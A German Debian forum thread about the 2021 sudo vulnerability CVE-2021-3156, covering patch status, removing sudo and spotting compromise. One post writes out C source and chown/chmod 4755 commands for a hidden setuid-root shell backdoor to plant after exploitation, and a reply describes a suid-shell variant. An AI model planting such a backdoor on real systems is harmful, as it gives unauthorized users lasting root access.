sudo schwere Sicherheitslücke gefixt?

Warum Debian und/oder eine seiner Spielarten? Was muss ich vorher wissen? Wo geht es nach der Installation weiter?
Antworten
Benutzeravatar
Sandersbeek
Beiträge: 174
Registriert: 04.05.2016 12:01:13

sudo schwere Sicherheitslücke gefixt?

Beitrag von Sandersbeek » 29.01.2021 19:02:31

Hallo,

weiss jemand ob die sudo Sicherheitslücke vom Debian-Projekt schon gefixt wurde oder macht das Debian-Projekt da nix direkt?

hab mir heute ein Video angesehen, welches gestern Live ging, wo davon erzählt wurde, das es die Lücke schon 10 Jahre geben soll. bei dem sudo Projekt auf github soll sich da wohl schon was getan haben.

zwar soll das nur gehen, wenn man direkt Physischen Zugriff auf den PC hat, also aus der Ferne soll das wohl nicht Funktionieren, mit der Sicherheitslücke.

Hier die Hauptquelle: https://www.helpnetsecurity.com/2021/01 ... 2021-3156/
Hier das Video: https://www.youtube.com/watch?v=zvcTV9yoAK0
Mit freundlichen Grüßen
Sandersbeek

System:
- Windows 10 Pro x64 / Debian 12
- CPU: Intel Core i7-10875H @ 16x 5.1GHz
- Mainboard: Tuxedo Gaming-Notebook
- Grafikkarte: NVIDIA GeForce RTX 2070 Super Mobile
- Festplatte: 4TB SanDisk Extreme PRO SSD (Win10)
- Festplatte: 1TB Samsung SSD 970 EVO Plus M.2 NVMe SSD (Debian)
- Festplatte: 2TB Samsung SSD 970 EVO Plus M.2 NVMe SSD (Debian/home)

JTH
Moderator
Beiträge: 3023
Registriert: 13.08.2008 17:01:41
Wohnort: Berlin

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von JTH » 29.01.2021 19:06:05

Manchmal bekannt als Just (another) Terminal Hacker.

Benutzeravatar
Sandersbeek
Beiträge: 174
Registriert: 04.05.2016 12:01:13

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von Sandersbeek » 29.01.2021 19:11:37

ah vielen dank, da sollte ich öfters mal nachsehen :)
Mit freundlichen Grüßen
Sandersbeek

System:
- Windows 10 Pro x64 / Debian 12
- CPU: Intel Core i7-10875H @ 16x 5.1GHz
- Mainboard: Tuxedo Gaming-Notebook
- Grafikkarte: NVIDIA GeForce RTX 2070 Super Mobile
- Festplatte: 4TB SanDisk Extreme PRO SSD (Win10)
- Festplatte: 1TB Samsung SSD 970 EVO Plus M.2 NVMe SSD (Debian)
- Festplatte: 2TB Samsung SSD 970 EVO Plus M.2 NVMe SSD (Debian/home)

Benutzeravatar
MSfree
Beiträge: 10721
Registriert: 25.09.2007 19:59:30

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von MSfree » 29.01.2021 19:14:26

Code: Alles auswählen

dpkg -l | grep sudo
liefert bei mir nichts. Kein sudo keine Sicherheitslücke :mrgreen:

eggy
Beiträge: 3331
Registriert: 10.05.2008 11:23:50

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von eggy » 29.01.2021 19:50:10

MSfree hat geschrieben: ↑ zum Beitrag ↑
29.01.2021 19:14:26
Kein sudo keine Sicherheitslücke :mrgreen:
@ MSfree: nicht traurig sein, gibt sicher auch in was anderem was für Dich :mrgreen:

Benutzeravatar
Meillo
Moderator
Beiträge: 8813
Registriert: 21.06.2005 14:55:06
Wohnort: Balmora
Kontaktdaten:

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von Meillo » 29.01.2021 19:59:18

Use ed once in a while!

Benutzeravatar
Meillo
Moderator
Beiträge: 8813
Registriert: 21.06.2005 14:55:06
Wohnort: Balmora
Kontaktdaten:

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von Meillo » 29.01.2021 20:43:35

Wenn ich da so drueber nachdenke, dann ist das schon eine echt happige Sicherheitsluecke. Also nicht so sehr fuer Einzeluser-Desktop-System, aber fuer alle Mehrbenutzer-Systeme, also typischerweise Server. Wenn da nicht umgehend die Sicherheitsupdates eingespielt worden sind, dann kann sich -- natuerlich nur wenn sudo auf dem System ist -- jeder User bequem eine root-Shell anlegen oder sich sonst einen dauerhaften root-Access einrichten. Im Vergleich zu den meisten anderen Sicherheitsluecken ist es hier halt so einfach und bequem moeglich sie zu nutzen. Da sicher noch nicht alle Systeme gepatcht sind, kann man sich auch immer noch den Weg machen ... :roll: Ich will gar nicht dran denken! :shocked:

So direkt bewusst ist mir das bisher noch nie gewesen, wie ich bekennen muss.
Use ed once in a while!

mcb

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von mcb » 29.01.2021 21:06:27

Ja die Lücke ist schei....

Kann man sudo eigentlich ganz runterschmeißen ?

fischig
Beiträge: 3634
Registriert: 24.12.2019 12:25:08
Lizenz eigener Beiträge: MIT Lizenz

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von fischig » 29.01.2021 21:10:00

Wenn du einen Root-Account hast - im Prinzip ja! :wink:

mcb

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von mcb » 29.01.2021 21:11:44

fischic hat geschrieben: ↑ zum Beitrag ↑
29.01.2021 21:10:00
Wenn du einen Root-Account hast - im Prinzip ja! :wink:
Also

Code: Alles auswählen

apt purge sudo
?

Benutzeravatar
MSfree
Beiträge: 10721
Registriert: 25.09.2007 19:59:30

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von MSfree » 29.01.2021 21:21:23

Meillo hat geschrieben: ↑ zum Beitrag ↑
29.01.2021 20:43:35
Wenn da nicht umgehend die Sicherheitsupdates eingespielt worden sind, dann kann sich -- natuerlich nur wenn sudo auf dem System ist -- jeder User bequem eine root-Shell anlegen oder sich sonst einen dauerhaften root-Access einrichten.
Hier der Weg, eine permanente root-Backdor zu bauen, solange sudo nicht gepatcht wurde:

Code: Alles auswählen

#include <stdio.h>

int main(void)
{
  seteuid(0);
  setuid(0);
  setgid(0);
  setegid(0);
  system("/bin/bash");
  return 0;
}
als sush.c speichern,

Code: Alles auswählen

cc -o sush sush.c
Dann die sudo-Lücke anwenden, um root-Rechte zu erlangen.
Anschließend die Dateirechte von sush mit

Code: Alles auswählen

chown root.root sush
chmod 4755 sush
ändern.

Danach hat man als normaler Benutzer jederzeit durch den Aufruf von sush eine root-Shell.

Benutzeravatar
Meillo
Moderator
Beiträge: 8813
Registriert: 21.06.2005 14:55:06
Wohnort: Balmora
Kontaktdaten:

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von Meillo » 29.01.2021 21:39:23

Man muss nicht mal selber kompilieren, wenn es eine andere Shell als die Bash auf dem System hat. Die kann man einfach kopieren, root zum Besitzer machen und das suid-Bit setzen. (Die Bash laesst sich nicht suid-root starten.)

Suid-Programme kann man auf einem System allerdings leicht suchen und auch deren Checksum vergleichen. Macht das nicht Debianrkhunter? So ein einfacher Ansatz sollte hoffentlich recht schnell auffallen und die dauerhafte root-Shell beseitigt werden koennen.

Sudo loggt doch seine Befehle? Damit sollte doch der mit `sudoedit' abgesetzte Befehl geloggt sein. ... wenn der Angreifer das Logfile nicht manipuliert hat, dann koennte man so ggf. rausfinden, wer die Luecke ausgenutzt hat ... wobei, wenn sie jemand ausnutzt, dann kann die Person natuerlich auch einfach den Username im Log abaendern ... Mist! :facepalm:

Am Ende laeuft es doch immer wieder darauf hinaus: Sobald ein System kompromitiert ist, kann man nur dann wieder sein, wenn man ein Backup von vor der Kompromitierung einspielt.
Use ed once in a while!

Benutzeravatar
MSfree
Beiträge: 10721
Registriert: 25.09.2007 19:59:30

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von MSfree » 29.01.2021 22:06:00

Meillo hat geschrieben: ↑ zum Beitrag ↑
29.01.2021 21:39:23
Suid-Programme kann man auf einem System allerdings leicht suchen und auch deren Checksum vergleichen.
Natürlich ist mein Ansatz extrem primitiv. Wenn man allerdings an so einem System z.B. ein RAID mit mehreren zig-Millionen Dateien angehängt hat, sucht sich rkhunter 'nen Wolf. So ein kleines Executable ist halt leicht in einer riesigen Datenmenge "versteckt" und nur sehr zeitaufwändig auffindbar.
Am Ende laeuft es doch immer wieder darauf hinaus: Sobald ein System kompromitiert ist, kann man nur dann wieder sein, wenn man ein Backup von vor der Kompromitierung einspielt.
Richtig.
Man muss nicht mal selber kompilieren, wenn es eine andere Shell als die Bash auf dem System hat.
Die Shells, mit denen ich bisher Kontakt hatte, haben sich eigentlich alle gegen SUID geschützt. Das ging schon 1992 mit der csh unter IRIX nicht. Daher ja der Trick mit dem system-Call in dem Executable. :wink:

Benutzeravatar
Meillo
Moderator
Beiträge: 8813
Registriert: 21.06.2005 14:55:06
Wohnort: Balmora
Kontaktdaten:

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von Meillo » 29.01.2021 22:24:48

MSfree hat geschrieben: ↑ zum Beitrag ↑
29.01.2021 22:06:00
Meillo hat geschrieben: ↑ zum Beitrag ↑
29.01.2021 21:39:23
Suid-Programme kann man auf einem System allerdings leicht suchen und auch deren Checksum vergleichen.
Natürlich ist mein Ansatz extrem primitiv. Wenn man allerdings an so einem System z.B. ein RAID mit mehreren zig-Millionen Dateien angehängt hat, sucht sich rkhunter 'nen Wolf. So ein kleines Executable ist halt leicht in einer riesigen Datenmenge "versteckt" und nur sehr zeitaufwändig auffindbar.
Akzeptiert.
MSfree hat geschrieben: ↑ zum Beitrag ↑
29.01.2021 22:06:00
Man muss nicht mal selber kompilieren, wenn es eine andere Shell als die Bash auf dem System hat.
Die Shells, mit denen ich bisher Kontakt hatte, haben sich eigentlich alle gegen SUID geschützt. Das ging schon 1992 mit der csh unter IRIX nicht. Daher ja der Trick mit dem system-Call in dem Executable. :wink:
Mit einer ksh habe ich das vor ein paar Jahren mal umgesetzt.
Use ed once in a while!

Benutzeravatar
MSfree
Beiträge: 10721
Registriert: 25.09.2007 19:59:30

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von MSfree » 29.01.2021 22:31:44

Meillo hat geschrieben: ↑ zum Beitrag ↑
29.01.2021 22:24:48
Mit einer ksh habe ich das vor ein paar Jahren mal umgesetzt.
Ich nehme an, das war noch ein Unix?
Schon lustig, was da teilweise für haarstreubende Sicherheitslücken existiert haben.

Benutzeravatar
Meillo
Moderator
Beiträge: 8813
Registriert: 21.06.2005 14:55:06
Wohnort: Balmora
Kontaktdaten:

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von Meillo » 29.01.2021 22:43:37

MSfree hat geschrieben: ↑ zum Beitrag ↑
29.01.2021 22:31:44
Meillo hat geschrieben: ↑ zum Beitrag ↑
29.01.2021 22:24:48
Mit einer ksh habe ich das vor ein paar Jahren mal umgesetzt.
Ich nehme an, das war noch ein Unix?
Nee.

Ich bin mir bloss nicht mehr ganz sicher, wie ich es gemacht habe. Das System war ein SLES oder RHEL. Entweder war die ksh dort drauf, oder ich habe sie extern kompiliert und dann dorthin kopiert. Ich denke aber, dass sie schon auf dem System war (sonst haette ich naemlich eher keine ksh zur Hand gehabt; ich verwende immer eine mksh). Ich weiss noch, dass ich es erst mit der bash probiert habe, was nicht ging. Vermutlich habe ich dann in /etc/shells geschaut was sonst noch fuer Shells vorhanden sind.

Hmm ... wobei, es war keine suid-root shell, sondern nur eine suid-nobody shell. Vielleicht haette suid-root nicht funktioniert ...
Use ed once in a while!

Benutzeravatar
OrangeJuice
Beiträge: 625
Registriert: 12.06.2017 15:12:40

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von OrangeJuice » 29.01.2021 23:05:18

Die sudo Lücke hätte man bestimmt gut mit der Flatpak-Lücke verbinden können oder?
In vulnerable versions, the Flatpak portal service passes caller-specified environment variables to non-sandboxed processes on the host system, and in particular to the flatpak run command that is used to launch the new sandbox instance. A malicious or compromised Flatpak app could set environment variables that are trusted by the flatpak run command, and use them to execute arbitrary code that is not in a sandbox. Quelle(CVE-2021-21261)

Benutzeravatar
detix
Beiträge: 1702
Registriert: 07.02.2007 18:51:28
Wohnort: MK

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von detix » 30.01.2021 14:05:41

mcb hat geschrieben:
fischic hat geschrieben: Wenn du einen Root-Account hast - im Prinzip ja! :wink:
Also

Code: Alles auswählen

apt purge sudo
?
Das ist für uns KDE Benutzer leider nicht so ganz klar:

Code: Alles auswählen

apt purge sudo
Das folgende Paket wurde automatisch installiert und wird nicht mehr benötigt:
  breeze-gtk-theme
Die folgenden Pakete werden ENTFERNT:
  kde-cli-tools* kscreen* libkf5su-bin* libkf5su5* plasma-desktop* sudo*
ob ich diese Pakete brauche oder nicht, werde ich nicht durchprobieren!
Womit KDE allerdings zufrieden ist, ist sudo durch ein entsprechendes dummy Paket (erstellt mit Debianequivs) zu ersetzen.
Gruß an alle Debianer, und immer daran denken:
Macht ohne Haftung funktioniert nicht!

mcb

Re: sudo schwere Sicherheitslücke gefixt?

Beitrag von mcb » 30.01.2021 20:33:52

detix hat geschrieben: ↑ zum Beitrag ↑
30.01.2021 14:05:41
mcb hat geschrieben:
fischic hat geschrieben: Wenn du einen Root-Account hast - im Prinzip ja! :wink:
Also

Code: Alles auswählen

apt purge sudo
?
Das ist für uns KDE Benutzer leider nicht so ganz klar:

Code: Alles auswählen

apt purge sudo
Das folgende Paket wurde automatisch installiert und wird nicht mehr benötigt:
  breeze-gtk-theme
Die folgenden Pakete werden ENTFERNT:
  kde-cli-tools* kscreen* libkf5su-bin* libkf5su5* plasma-desktop* sudo*
ob ich diese Pakete brauche oder nicht, werde ich nicht durchprobieren!
Womit KDE allerdings zufrieden ist, ist sudo durch ein entsprechendes dummy Paket (erstellt mit Debianequivs) zu ersetzen.
Danke - für mich als Gnome Benutzer ist es auch nicht ganz klar - obwohl mein Benutzer hat kein sudo -> also könnte es wohl weg ?!?

Code: Alles auswählen

marc@mb:~$ apt remove -s sudo
NOTE: This is only a simulation!
      apt needs root privileges for real execution.
      Keep also in mind that locking is deactivated,
      so don't depend on the relevance to the real current situation!
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages will be REMOVED:
  sudo
0 upgraded, 0 newly installed, 1 to remove and 0 not upgraded.
Remv sudo [1.9.5p2-1]
marc@mb:~$ 


Antworten